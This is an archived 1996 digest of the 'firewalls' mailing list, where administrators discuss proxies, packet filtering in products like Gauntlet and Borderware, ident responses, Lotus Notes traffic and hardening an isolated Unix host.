firewalls-owner Tue Feb 13 02:55:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA03253 for firewalls-outgoing; Tue, 13 Feb 1996 02:43:47 -0800 (PST) Received: from godel2.bim.be (godel2.bim.be [141.253.4.135]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA03234 for ; Tue, 13 Feb 1996 02:43:30 -0800 (PST) Received: from dvorak.bim.be.bim.be by godel2.bim.be (SMI-8.6/SMI-SVR4) id LAA01921; Tue, 13 Feb 1996 11:44:45 +0100 Date: Tue, 13 Feb 1996 11:44:45 +0100 From: pc@bim.be (Philippe Cayphas) Message-Id: <199602131044.LAA01921@godel2.bim.be> To: firewalls@greatcircle.com Subject: Proxy for X.400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I'm searching for an X.400 proxy running on a firewall. Has someone already seen that? Or may be implemented it using, for example, plug-gw? Thannk you. Philippe -- Ph. Cayphas Senior Engineer E-Mail: pc@bim.be Telephone: +32(10)47.08.32 Fax : +32(10)47.08.11 Postal Mail : Ph. Cayphas BIM sa 4, Av. Albert Einstein 1348 Louvain-La-Neuve Belgium From firewalls-owner Tue Feb 13 03:24:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA04054 for firewalls-outgoing; Tue, 13 Feb 1996 03:17:13 -0800 (PST) Received: from mail.Germany.EU.net (mail.germany.eu.net [192.76.144.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA04049 for ; Tue, 13 Feb 1996 03:16:55 -0800 (PST) Received: by mail.Germany.EU.net with SMTP (5.59:15/EUnetD-2.5.3.d) via EUnet id MAA14220; Tue, 13 Feb 1996 12:16:13 +0100 Received: from mail.tntm by white.telenet.de id aa16103; 13 Feb 96 12:16 MEZ Received: from cc:Mail by mail.muc.telenet.de id AA824242369; Tue, 13 Feb 96 12:11:10 CET Date: Tue, 13 Feb 96 12:11:10 CET From: "Schlter, Olaf" Message-Id: <9601138242.AA824242369@mail.muc.telenet.de> To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: Frederick M Avolio Date: Mon, 12 Feb 1996 17:16:55 -0500 Subject: Re: Gauntlet 3.1 Packet Filter? At 02:00 PM 2/12/96 -0600, Steven W. Engle wrote: >Does Gauntlet 3.1 packet filter in the conventional sense (permit / deny >source / destination)? Or it is purely a application level proxy services >approach? It is an application gateway, as you suggest, and purely that, but it does uses rules based on many things including source and destination. >I checked out the TIS web sight and could not find any specific statments >toward "yes, it packet filters". No, it does not packet filter. So what about the ipfs(8) utilitiy, which lets you configure rules for denying, forwarding and absorbing (i.e. forwarding packets destined to the outside to the application layer proxies) ? Looks pretty well like a packet filter. Regards, Olaf Schlueter, Telenet GmbH, Munich, Germany From firewalls-owner Tue Feb 13 03:39:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA04449 for firewalls-outgoing; Tue, 13 Feb 1996 03:28:31 -0800 (PST) Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA04444 for ; Tue, 13 Feb 1996 03:28:27 -0800 (PST) Received: from scorpian.europe.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA22132; Tue, 13 Feb 1996 06:27:38 -0500 Received: from mojo.europe.dg.com by scorpian.europe.dg.com (5.4R3.00/dg-s04) id AA25120; Tue, 13 Feb 1996 11:27:35 GMT Received: by mojo.europe.dg.com (5.4R3.10/dg-gens08) id AA00343; Tue, 13 Feb 1996 11:27:25 GMT Message-Id: <9602131127.AA00343@mojo.europe.dg.com> Subject: Firewall comparison chart??? To: firewalls@greatcircle.com Date: Tue, 13 Feb 96 11:27:25 GMT From: Phil Davidson X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just wondering if anyone has seen a chart that compares the various Firewall packages currently available. The kind that lists which features are available or not or the different packages. cheers Phil From firewalls-owner Tue Feb 13 04:24:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA06288 for firewalls-outgoing; Tue, 13 Feb 1996 04:12:49 -0800 (PST) Received: from close.demon.co.uk (close.demon.co.uk [158.152.8.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA06283 for ; Tue, 13 Feb 1996 04:12:15 -0800 (PST) Received: (from smap@localhost) by close.demon.co.uk (8.6.12/8.6.9) id KAA12561; Tue, 13 Feb 1996 10:01:30 GMT Message-Id: <199602131001.KAA12561@close.demon.co.uk> Received: from shut.ticl.co.uk(193.32.1.3) by gate.ticl.co.uk via smap (V1.3) id sma012557; Tue Feb 13 10:01:25 1996 Date: Tue, 13 Feb 96 11:03:15 0000 From: Peter Curran MIME-Version: 1.0 To: Kevin Steves CC: firewalls@greatcircle.com Subject: RE: Web browser ports? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > In Chapter 14 of TCP/IP Illustrated Volume 3 Volume 3 of Stevens? What is this one about, has it been out for long? Peter From firewalls-owner Tue Feb 13 06:14:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA10154 for firewalls-outgoing; Tue, 13 Feb 1996 06:02:38 -0800 (PST) Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA10136; Tue, 13 Feb 1996 06:02:24 -0800 (PST) Message-Id: <199602131402.GAA10136@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA120160094; Tue, 13 Feb 1996 09:01:34 -0500 Date: Tue, 13 Feb 1996 09:01:34 -0500 From: gary flynn To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM Subject: Re: Dead End Concepts-Encryption Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Just as we had to move protection from the workstation/node level to the > network/subnet (e.g. firewalls), transaction protection must also be moved. > I am seeing a lot of whole keys on blue backgrounds these days... > Then again, one could argue that encryption puts the onus back on the node where the encryption takes place and lets the network do what it does best...communicate. One could also argue that a firewall is nothing more than a restrictive node in the communications path. (No, a router doesn't fit this definition. The firewall has application knowledge and, sometimes, user interaction.) The firewall concept's main weakness is it assumes there is a trusted and untrusted side. Reality is rarely this simple. True, because of the insecure nature of some of today's services (whether by poor design or misconfiguration), firewalls are necessary. But I'd think that node to node encryption combined with strong authentication (i.e. good passwords) would take care of most technologically related security problems. The main challenge is ensuring that the node can't communicate without these functions. Gary Flynn James Madison University Security Neophyte From firewalls-owner Tue Feb 13 07:00:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA10679 for firewalls-outgoing; Tue, 13 Feb 1996 06:34:42 -0800 (PST) Received: from WVLINK.MPL.COM (WVLINK.MPL.COM [198.77.4.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA10665 for ; Tue, 13 Feb 1996 06:34:36 -0800 (PST) Date: Tue, 13 Feb 1996 06:34:36 -0800 (PST) Message-Id: <199602131434.GAA10665@miles.greatcircle.com> Received: from pc-1 by WVLINK.MPL.COM (MX V4.0 VAX) with SMTP; Tue, 13 Feb 1996 09:34:21 EST X-Sender: jim@wvlink.mpl.com X-Mailer: Windows Eudora Version 2.0.3 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: jim@wvlink.mpl.com (Jim Poling) Subject: Problems with Borderware without internet Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am trying to get V3.0.1 of Borderware's Firewall to work on a large network, that has no access to the internet. Basicially the internal/protected side has many many machines, routers, DNS's, but the external/unprotected side would just have a Terminal Server with dialup modems. Borderware asks for the external/internal IP addres, the netmask, and the connection type (10base-T), and then an external router. As you can see from my description above I don't have an external router, just the terminal server. I go ahead and give the I/P number of the Terminal Server as the external router, and from the firewall I can ping the terminal server on the external side, and I can ping a VAX on the internal side. I can ping the internal side of the FW from the VAX on the internal network. I can ping the external side of the FW from the terminal server on external network. But I can't ping the internal side from the external side with the terminal server, and I can't ping the external side from the internal side with the VAX on the secure network. I don't have anything fancy setup on it, no DNS, no static routes defined. I'm not where I can get a show routes right now, but I do remember there was a 127.0.0.1 -> 127.0.0.1 that puzzled me, since there was a 127.0.0.1 for both internal and external networks. Thanks, -Jim Poling MPL Corp. Buckhannon, WV JIM@WVLINK.MPL.COM (304)472-9520 From firewalls-owner Tue Feb 13 07:01:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA11039 for firewalls-outgoing; Tue, 13 Feb 1996 06:51:48 -0800 (PST) Received: from london.micrognosis.com (midas.london.micrognosis.com [193.114.123.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA11024 for ; Tue, 13 Feb 1996 06:51:35 -0800 (PST) Received: by london.micrognosis.com (4.1/NAR-Gateway) id AA21506; Tue, 13 Feb 96 14:50:35 GMT Received: from zeus.london.micrognosis.com(192.83.165.17) by midas via smap (V1.0mjr) id sma021501; Tue Feb 13 14:50:11 1996 Received: by zeus.london.micrognosis.com (4.1/SMI-4.1) id AA14673; Tue, 13 Feb 96 14:50:08 GMT From: nreadwin@london.micrognosis.com (Neil Readwin) Message-Id: <9602131450.AA14673@zeus.london.micrognosis.com> Subject: Re: port 113? To: firewalls@greatcircle.com Date: Tue, 13 Feb 1996 14:50:08 +0000 (GMT) In-Reply-To: from "Mark Lentczner" at Feb 12, 96 09:12:07 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > echo $QUERY:OTHER:bob IMHO it would be closer to the spirit of the RFC to do echo $QUERY : ERROR : UNKNOWN-ERROR or at least echo $QUERY : USERID : OTHER : bob -- E-mail: nreadwin@micrognosis.co.uk BOFH-mail: nreadwin@dot.dot From firewalls-owner Tue Feb 13 08:46:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA13658 for firewalls-outgoing; Tue, 13 Feb 1996 08:39:14 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA13653 for ; Tue, 13 Feb 1996 08:39:10 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA20197; Tue, 13 Feb 96 10:41:22 CST Received: by mnbp.network.com with Microsoft Mail id <3120BE02@mnbp.network.com>; Tue, 13 Feb 96 10:36:18 CST From: Michael Brown To: firewalllist Subject: RE: Firewall comparison chart??? Date: Tue, 13 Feb 96 10:35:00 CST Message-Id: <3120BE02@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here's a starting point www.access.digex.net/~bdboyle/firewall.vendor.html some is wrong and a few products have more capabilites, however all the web pages are listed so you can visit each one for the latest info. mkb www.network.com ---------- Just wondering if anyone has seen a chart that compares the various Firewall packages currently available. The kind that lists which features are available or not or the different packages. cheers Phil From firewalls-owner Tue Feb 13 11:22:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA16680 for firewalls-outgoing; Tue, 13 Feb 1996 11:08:19 -0800 (PST) Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA16675 for ; Tue, 13 Feb 1996 11:08:16 -0800 (PST) Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (v8.7.3/8.6.4) with ESMTP id NAA06602 for ; Tue, 13 Feb 1996 13:07:37 -0600 (CST) From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id NAA22780; Tue, 13 Feb 1996 13:07:33 -0600 Date: Tue, 13 Feb 1996 13:07:33 -0600 Subject: Re: Firewall comparison chart??? To: firewalls@greatcircle.com Message-Id: In-Reply-To: <9602131127.AA00343@mojo.europe.dg.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Network Computing (just arrived today) has a review of 6 firewall products. I haven't read it yet, I don't know which ones they are evaluating. It's a feature article though. [ This message has been sent to the firewalls list. If you reply to this message to the list, please do not CC me on the reply. I subscribe to the list and will read it there ] -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Pro is to Con as progress is to congress From firewalls-owner Tue Feb 13 11:31:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA16781 for firewalls-outgoing; Tue, 13 Feb 1996 11:16:11 -0800 (PST) Received: from vidnoe.yourtown.com (vidnoe.yourtown.com [199.125.234.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA16774 for ; Tue, 13 Feb 1996 11:16:07 -0800 (PST) Received: from web (joechang.dialup.access.net) by vidnoe.yourtown.com (4.1/SMI-4.1) id AA03172; Tue, 13 Feb 96 14:14:30 EST Message-Id: <3120E12E.485E@jcrew.com> Date: Tue, 13 Feb 1996 14:06:22 -0500 From: Bill Van Emburg Organization: J. Crew X-Mailer: Mozilla 2.0b5 (X11; I; SunOS 5.4 sun4m) Mime-Version: 1.0 To: Mark Lentczner Cc: firewalls@greatcircle.com Subject: Re: port 113? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mark Lentczner wrote: > > Question: Has anyone identified (no pun intended) the web server software > that does this useless ident probe? If it is a common server, what option > is needed to turn it off. 113 beyond your own secure net is useless (see > the useful information the ident server above will return!) and there is no > reason for any Internet web server to use it. > HTTPD 1.3 uses the option, "IdentityCheck", to do this. It is off by default. If it actually *were* an available service on more machines, it would be incredibly valuable for all sorts of things, from interactively determining that the same user is hitting different pages (and modifying content appropriately), to simply providing more accurate logging of sessions when massaging the log files. Alas, it is *not* more commonly available, and it's a slow protocol to boot! Oh well.... -BVE (Bill Van Emburg) (bve@yourtown.com) From firewalls-owner Tue Feb 13 11:39:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA16728 for firewalls-outgoing; Tue, 13 Feb 1996 11:12:12 -0800 (PST) Received: from pilot.firewall.is.chrysler.com (pilot.is.chrysler.com [204.189.94.147]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA16723 for ; Tue, 13 Feb 1996 11:11:52 -0800 (PST) Received: by pilot.firewall.is.chrysler.com; id OAA22949; Tue, 13 Feb 1996 14:31:27 -0500 Received: from clhubgw1.is.chrysler.com(172.29.128.203) by pilot.is.chrysler.com via smap (g3.0.1) id sma022942; Tue, 13 Feb 96 14:31:09 -0500 Received: from mjp2lap.is.chrysler.com by clhubgw1.is.chrysler.com (5.x/SMI-4.1) id AA28115; Tue, 13 Feb 1996 14:12:30 -0500 Message-Id: <2.2.16.19960213191028.52ff9578@pop3hub.is.chrysler.com> X-Sender: t0925mp@pop3hub.is.chrysler.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 13 Feb 1996 14:10:28 -0500 To: firewalls@greatcircle.com From: Mike Papais Subject: Firewalls and Lotus Notes Summary Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As promised here is a brief summary of responses to my posting regarding what the rest of the world is doing regarding Notes through firewalls. I thank in advance all the contributors and commiserate with all the souls that are in the same boat. The most common technique is to use "plug-gw" functionality to marry a pair of Notes Servers from the inside to the outside. This is reported to work very well. While not the absolute leading edge of security, it does provide significant functionality with a reasonable amount of control. Several vendors (Checkpoint, V-One) responded that their offerings can play in this arena. Checkpoint indicated that they are adept at supporting connection less protocols and have worked well with Notes in the past. V-One offers middle ware (Smartwall) that can enhance the Notes Encryption and further deepen the bag of tricks available to firewall administrators. This posting is not to endorse either of these products, just to note their potential applicability. Mike Papais mjp2@is.chrysler.com Chrysler Corporation 810-758-9781 Standard disclaimers apply. From firewalls-owner Tue Feb 13 11:54:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA16687 for firewalls-outgoing; Tue, 13 Feb 1996 11:08:32 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA16682 for ; Tue, 13 Feb 1996 11:08:26 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id LAA14102; Tue, 13 Feb 1996 11:04:50 -0800 Received: from dns.eng.auburn.edu(131.204.10.13) by mycroft via smap (V1.3mjr) id sma014100; Tue Feb 13 11:04:19 1996 Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (v8.7.3/8.6.4) with ESMTP id NAA06464 for ; Tue, 13 Feb 1996 13:05:24 -0600 (CST) From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id NAA22766; Tue, 13 Feb 1996 13:05:22 -0600 Date: Tue, 13 Feb 1996 13:05:22 -0600 Subject: Re: Isolated box... To: firewalls@greatcircle.com Message-Id: In-Reply-To: <9602130708.AA22999@afya.acs.uwosh.edu> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >Hi all, > >This may not be entirely relevant for firewalls, but I think it is >close, so... > >I have an opportunity to get a couple of old Sun IPCs to use to >provide services such as RARP, bootp/dhcp, bootparams, etc as well as >some network listening. RARP under SunOS 4.1.n needs the /dev/nit >device, which I do not want to put on an "open" machine. > >Would stripping all services from /etc/inetd, stopping nfs, NIS, etc, >basically only allowing console logins, and only supporting sendmail >going out, ftp going out, pulling unneeded devices/filesystem >types/etc out of the kernel, etc be sufficient protection for this >box, or are there some other parameters that would need to be tweaked >either in the kernel at run time or in some header files? > Sounds like you've got the hang of it. Get rid of everything out of inetd.. Heck, you might not want to even run it at all.. Not having an /etc/exports file means NFS won't start. You could comment out the biods to for that matter if you're not mounting anything. Sounds like you wouldn't need sendmail at all. Heck, you could even not have a default route out of this puppy.. People can bombard it all they want, and it wouldn't know how to reply if it didn't have the route. We use this technique on some of our NFS servers. You can add a static route by hand, do your thing, and delete it when you're done if you need to. Once you've done this, the device is essentially inaccessible except via console. Don't need to run sendmail daemon at all either. >Basically I would like to lock that /dev/nit device into a controled >environment. It would be a pain in the but to administer, but it >should not require much in the way of maintenance. > You wouldn't even have to update security holes since nobody can log in to it. You can can remove all the ptys and ttys except for the console (unless you plan on running windows, in which case you'll need a couple for terminals windows. it might be a bit ugly, because you'll have to update the databases by hand, which, as you said, will be a pain in the but to administer. tradeoff: If these are for those broadcast protocols as you mentioned, you might want to not make it totally inaccessible to your internal net, but just remove the route to the outside world. (at your discretion). This will make administration easier while lessening battened down security somewhat. [ This message has been posted to the firewalls list. Please do not CC myself if you reply to the list. I will read replies sent to the list, and don't need two. Thanks. ] -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Pro is to Con as progress is to congress From firewalls-owner Tue Feb 13 13:03:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA18691 for firewalls-outgoing; Tue, 13 Feb 1996 12:29:54 -0800 (PST) Received: from uu2.psi.com (uu2.psi.com [128.145.228.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA18677 for ; Tue, 13 Feb 1996 12:29:48 -0800 (PST) Received: by uu2.psi.com (5.65b/4.0.940727-PSI/PSINet) via UUCP; id AA10593 for ; Tue, 13 Feb 96 09:12:55 -0500 Received: from keywest.ccifl.com (keywest.ARPA) by ccifl.com (4.1/3.2.012693-CAD CAM Southeast); id AA12023 for GreatCircle.COM!firewalls; Tue, 13 Feb 96 09:00:11 EST Received: by keywest.ccifl.com (5.x/SMI-SVR4) id AA11752; Tue, 13 Feb 1996 08:57:33 -0500 Date: Tue, 13 Feb 1996 08:57:33 -0500 From: mark@ccifl.com (Mark Sherman) Message-Id: <9602131357.AA11752@keywest.ccifl.com> To: firewalls@GreatCircle.COM Subject: Re: your mail X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From firewalls-owner@GreatCircle.COM Mon Feb 12 17:54:12 1996 > Date: Mon, 12 Feb 1996 10:52:24 -0800 (PST) > From: Kent Dahlgren > To: Oliver Friedrichs > Cc: Brosl Hasslacher , firewalls@GreatCircle.COM > Subject: Re: your mail > Mime-Version: 1.0 > > > On Mon, 12 Feb 1996, Oliver Friedrichs wrote: > > > You realize this was posted from a hacked account right ? > > I'll bet dimes to doughnuts the prankster is reading these group postings, > snickering to him or herself. Real proud. Probably one of those geeks > who spend thier weekends in IRC flooding people. Has the owner of the > "hacked" account replied yet? > > Hey, look what I can do using an ordinary text editor like vi: > > total 15576 > drwx------ 59 total 15576 > drwx------ 59 tsutomu 5120 Feb 12 09:35 . > drwxr-xr-x 26 root 1024 Feb 9 13:12 .. > -rw------- 1 tsutomu 148 Jun 15 1995 .Xauthority > -rw------- 1 tsutomu 690 Oct 19 09:13 .cshrc > -rw------- 1 tsutomu 4849 Jul 12 1995 .emacs > -rw------- 1 tsutomu 555 Jan 3 07:12 .login > drwx------ 2 tsutomu 5632 Dec 27 13:07 .netscape-cache > > Hell, as far as that goes, I can make it look like I hacked anyone's account: > > total 15576 > drwx------ 59 winniethepooh 5120 Feb 12 09:35 . > drwxr-xr-x 26 root 1024 Feb 9 13:12 .. > -rw------- 1 winniethepooh 148 Jun 15 1995 .Xauthority > -rw------- 1 winniethepooh 690 Oct 19 09:13 .cshrc > -rw------- 1 winniethepooh 4849 Jul 12 1995 .emacs > -rw------- 1 winniethepooh 555 Jan 3 07:12 .login > drwx------ 2 winniethepooh 5632 Dec 27 13:07 .netscape-cache > > Man, this wild wacky world of hacking is really cool! Maybe I'll get chicks! > Maybe I'll get a life! > > > Hacked ? not Hacked ? lets give him/her some more bandwidth, that 'll stop `em. HUH? From firewalls-owner Tue Feb 13 15:54:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA23983 for firewalls-outgoing; Tue, 13 Feb 1996 15:46:36 -0800 (PST) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA23978 for ; Tue, 13 Feb 1996 15:46:33 -0800 (PST) Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id PAA08567; Tue, 13 Feb 1996 15:45:56 -0800 Received: from caribe.eng.sun.com (caribe-85.Eng.Sun.COM) by Eng.Sun.COM (5.x/SMI-5.3) id AA00398; Tue, 13 Feb 1996 15:45:52 -0800 Received: from chapp.eng.sun.com (chapp [129.146.85.56]) by caribe.eng.sun.com (8.7.1/8.7.1) with SMTP id PAA25288 for ; Tue, 13 Feb 1996 15:45:02 -0800 (PST) Received: by chapp.eng.sun.com (5.x/SMI-SVR4) id AA18484; Tue, 13 Feb 1996 15:46:27 -0800 Date: Tue, 13 Feb 1996 15:46:27 -0800 From: jsampson@caribe-85.Eng.Sun.COM (James Sampson [TEMP]) Message-Id: <9602132346.AA18484@chapp.eng.sun.com> To: firewalls@greatcircle.com Subject: firewall development project X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm looking for an experienced firewall developer to become part of a start-up firewall project. If interested or to get more info please contact me at: 415-786-6851 415-786-2512 fax thank you' Jim Sampson From firewalls-owner Tue Feb 13 17:50:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA25427 for firewalls-outgoing; Tue, 13 Feb 1996 16:46:43 -0800 (PST) Received: from teal.csn.net (teal.csn.net [199.117.27.22]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA25413 for ; Tue, 13 Feb 1996 16:46:19 -0800 (PST) Received: (from surguine@localhost) by teal.csn.net (8.6.12/8.6.9) id RAA09593; Tue, 13 Feb 1996 17:45:36 -0700 Date: Tue, 13 Feb 1996 17:45:36 -0700 From: Scott Surguine Message-Id: <199602140045.RAA09593@teal.csn.net> To: firewalls@greatcircle.com Subject: INN/NNTP Security Implications Cc: surguine@teal.csn.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello Folks, I have a few questions regarding Security Concerns and INN/NNTP Our site consists entirely of WEB Servers. We utilize a Packet Filter on a CISCO 2501. Our Stance is as follows: Anything which is not implicitly allowed is denied. We currently have the need to provide private newsgroups for some of our WEB servers. Hence, I have configured INN to provide "private" service only. What Are the security implications of allowing traffic accross port 119 for accessing ( reading, posting, etc ... ) to our "private" newsgroups on our Newsserver? If I do not configure my site to obtain newsfeeds from outside our site, Can someone still spoof feeds to my site? Does anyone know of specific security related issues reagarding INN? I am configuring INN1.4sec, which is a "security" patch to INN1.4. Can someone explain what hole INN1.4sec patches? Are there any known methods by which "Automatic Group Creation" can take place in INN? MANY THANKS IN ADVANCE, Scott A. Surguine surguine@csn.net From firewalls-owner Tue Feb 13 18:56:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA29658 for firewalls-outgoing; Tue, 13 Feb 1996 18:38:47 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA29645 for ; Tue, 13 Feb 1996 18:38:40 -0800 (PST) Received: by garrison.com. (4.1/Nutered Mailer) id AA00889; Tue, 13 Feb 96 20:34:40 CST Date: Tue, 13 Feb 96 20:34:40 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602140234.AA00889@garrison.com.> To: firewalls@greatcircle.com, sengle@hti.net, BROWNMK@misf.network.com Subject: RE: Gauntlet 3.1 Packet Filter? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk BROWNMK@misf.network.com wrote: > You're looking for the NSC equipment, i.e. BorderGuard. > check out www.network.com and look at security stuff. > > _____________________________________________________ sengle@hti.net wrote: > Subject: Gauntlet 3.1 Packet Filter? > Date: Monday, February 12, 1996 2:00PM > > Does Gauntlet 3.1 packet filter in the conventional sense (permit / deny > source / destination)? Or it is purely a application level proxy services > approach? > > If I have IP traffic for which there is no proxy for, how can I control > this traffic without writing a custom proxy? > > If it does packet-filter, how (well) are the proxy "rules" integrated with > the packet-filtering "rules"? > > I checked out the TIS web sight and could not find any specific statments > toward "yes, it packet filters". Don't forget to mention that your BorderGuard product is simply a packet filtering mechanism. From firewalls-owner Tue Feb 13 20:39:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA02679 for firewalls-outgoing; Tue, 13 Feb 1996 20:31:56 -0800 (PST) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA02674 for ; Tue, 13 Feb 1996 20:31:52 -0800 (PST) Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQacta15606; Tue, 13 Feb 1996 08:43:29 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA07282; Tue, 13 Feb 96 08:32:25 EST Date: Tue, 13 Feb 1996 08:32:25 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: PC Magazine article on firewalls Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The March 12, 1996 edition of PC Magazine (Ziff-Davis Publishing) has an article on firewalls starting on page NE1. The Editor's Choice goes to the TIS Gauntlet. No argument with that selection but I am surprised they made an Editor's Choice at all. Usually a firewall is customized to the needs of the site and the needs of sites are often completely different from each other. Anyway, on to the reason for this posting. The article says that Firewall-1 is available for HP-UX 9. and HP-UX 10. Is this true or is that just the garbage out from a salesdroid? Sick Puppy, OJ Simpson's Cut_and_Slash_Dawg wearer of Isotoner gloves [ WARNING: sniffing Fade RedNeck's rear may be hazardous to your health ] [ in case of overdose, chew massive amounts of anti-histamines ] From firewalls-owner Tue Feb 13 20:54:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA02880 for firewalls-outgoing; Tue, 13 Feb 1996 20:41:04 -0800 (PST) Received: from han.hana.nm.kr (han.hana.nm.kr [128.134.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA02816 for ; Tue, 13 Feb 1996 20:39:29 -0800 (PST) Received: from saitgw.Sait.Samsung.Co.KR by han.hana.nm.kr (4.1/KUM-0.1) id AA08109; Wed, 14 Feb 96 13:46:09 KST Received: from noc.sait.samsung.co.kr. by saitgw.Sait.Samsung.Co.KR (4.1/SMI-4.1) id AA25723; Wed, 14 Feb 96 13:33:33 KST Received: from fiji.info.samsung.co.kr by noc.sait.samsung.co.kr. (8.6.9H1/SMI-SVR4) id NAA24424; Wed, 14 Feb 1996 13:47:57 +0900 Date: Wed, 14 Feb 1996 13:47:57 +0900 Message-Id: <199602140447.NAA24424@noc.sait.samsung.co.kr.> X-Sender: kes@coda.info.samsung.co.kr X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: "Kang, Eun-Seong" Subject: Re: Re: Firewall comparison chart??? 